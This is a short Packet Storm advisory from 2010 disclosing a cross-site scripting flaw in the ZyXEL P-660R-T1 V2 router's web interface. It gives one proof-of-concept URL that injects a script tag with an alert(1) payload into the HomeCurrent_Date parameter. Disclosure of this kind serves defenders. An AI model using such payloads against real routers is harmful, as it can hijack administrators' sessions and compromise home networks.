ZyXEL P-660R-T1 V2 Cross Site Scripting

2010-11-22T00:00:00
ID PACKETSTORM:96069
Type packetstorm
Reporter Usman Saeed
Modified 2010-11-22T00:00:00

Description

                                        
                                            `#####################################################################################   
  
#  
# Name : ZyXEL P-660R-T1 V2 XSS  
# Author : Usman Saeed from Xc0re Security Research Group  
# Homepage :http://www.xc0re.net  
# Dated : 22/11/2010  
#  
#####################################################################################   
  
  
  
  
Exploit:  
  
VECTOR   
:http://IP/Forms/home_1?&HomeCurrent_Date='<sCript>alert(1);</ScRiPt>'01%2F01%2F2000   
  
  
This works with the post request ! As by default this value is sent   
through POST request.  
`